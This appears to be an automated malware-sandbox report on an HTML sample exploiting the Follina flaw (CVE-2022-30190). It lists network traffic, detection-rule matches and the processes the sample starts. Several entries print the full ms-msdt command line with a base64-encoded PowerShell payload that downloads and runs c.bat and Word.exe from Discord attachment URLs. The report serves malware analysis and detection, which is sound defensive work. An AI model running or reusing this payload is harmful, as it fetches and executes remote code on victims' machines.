Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://www.gstatic.com

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

Source: unknown

DNS traffic detected: queries for: accounts.google.com

Source: global traffic

HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

System Summary

Source: nF0trs9UzA.html, type: SAMPLE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: nF0trs9UzA.html, type: SAMPLE	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: 0000000C.00000002.669283741.000002CBFCE90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000002.669847334.000002CBFD114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: msdt.exe PID: 6784, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Source: nF0trs9UzA.html	Virustotal: Detection: 42%
Source: nF0trs9UzA.html	ReversingLabs: Detection: 35%

Source: C:\Windows\System32\msdt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\nF0trs9UzA.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,10822360021867408005,7468589743208575355,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1960 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTg0Njg5ODU4ODMwMjcwNDc3Lzk4NjQyMjI3NzMxNjkzOTgxNi9jLmJhdCAtT3V0RmlsZSBDOlxXaW5kb3dzXFRhc2tzXGMuYmF0IDsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJ0M6XFdpbmRvd3NcVGFza3NcYy5iYXQnIC1XaW5kb3dTdHlsZSBIaWRkZW47IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzk4NTM2Mzc3MjIxNjYwNjc1MC85ODUzNjQxMTE4NzEzMTU5NjgvV29yZC5leGUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZTsgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZSA7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,10822360021867408005,7468589743208575355,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1960 /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTg0Njg5ODU4ODMwMjcwNDc3Lzk4NjQyMjI3NzMxNjkzOTgxNi9jLmJhdCAtT3V0RmlsZSBDOlxXaW5kb3dzXFRhc2tzXGMuYmF0IDsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJ0M6XFdpbmRvd3NcVGFza3NcYy5iYXQnIC1XaW5kb3dTdHlsZSBIaWRkZW47IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzk4NTM2Mzc3MjIxNjYwNjc1MC85ODUzNjQxMTE4NzEzMTU5NjgvV29yZC5leGUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZTsgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZSA7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62A98650-1778.pma

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\2f173533-4bef-4c06-a9ca-30c5c91e7848.tmp

Jump to behavior

Source: classification engine

Classification label: mal56.expl.winHTML@38/155@2/5

Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
Source:	Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr

Data Obfuscation

Source: widevinecdm.dll.0.dr	Static PE information: section name: .00cfg
Source: widevinecdm.dll.0.dr	Static PE information: section name: .rodata
Source: widevinecdm.dll.0.dr	Static PE information: section name: _RDATA

Persistence and Installation Behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\6008_103567953\_platform_specific\win_x64\widevinecdm.dll

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\6008_2054561844\LICENSE.txt

Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\msdt.exe	Window / User API: threadDelayed 1935			Jump to behavior
Source: C:\Windows\System32\msdt.exe	Window / User API: threadDelayed 955			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTg0Njg5ODU4ODMwMjcwNDc3Lzk4NjQyMjI3NzMxNjkzOTgxNi9jLmJhdCAtT3V0RmlsZSBDOlxXaW5kb3dzXFRhc2tzXGMuYmF0IDsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJ0M6XFdpbmRvd3NcVGFza3NcYy5iYXQnIC1XaW5kb3dTdHlsZSBIaWRkZW47IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzk4NTM2Mzc3MjIxNjYwNjc1MC85ODUzNjQxMTE4NzEzMTU5NjgvV29yZC5leGUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZTsgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZSA7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTg0Njg5ODU4ODMwMjcwNDc3Lzk4NjQyMjI3NzMxNjkzOTgxNi9jLmJhdCAtT3V0RmlsZSBDOlxXaW5kb3dzXFRhc2tzXGMuYmF0IDsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJ0M6XFdpbmRvd3NcVGFza3NcYy5iYXQnIC1XaW5kb3dTdHlsZSBIaWRkZW47IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzk4NTM2Mzc3MjIxNjYwNjc1MC85ODUzNjQxMTE4NzEzMTU5NjgvV29yZC5leGUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZTsgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZSA7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22			Jump to behavior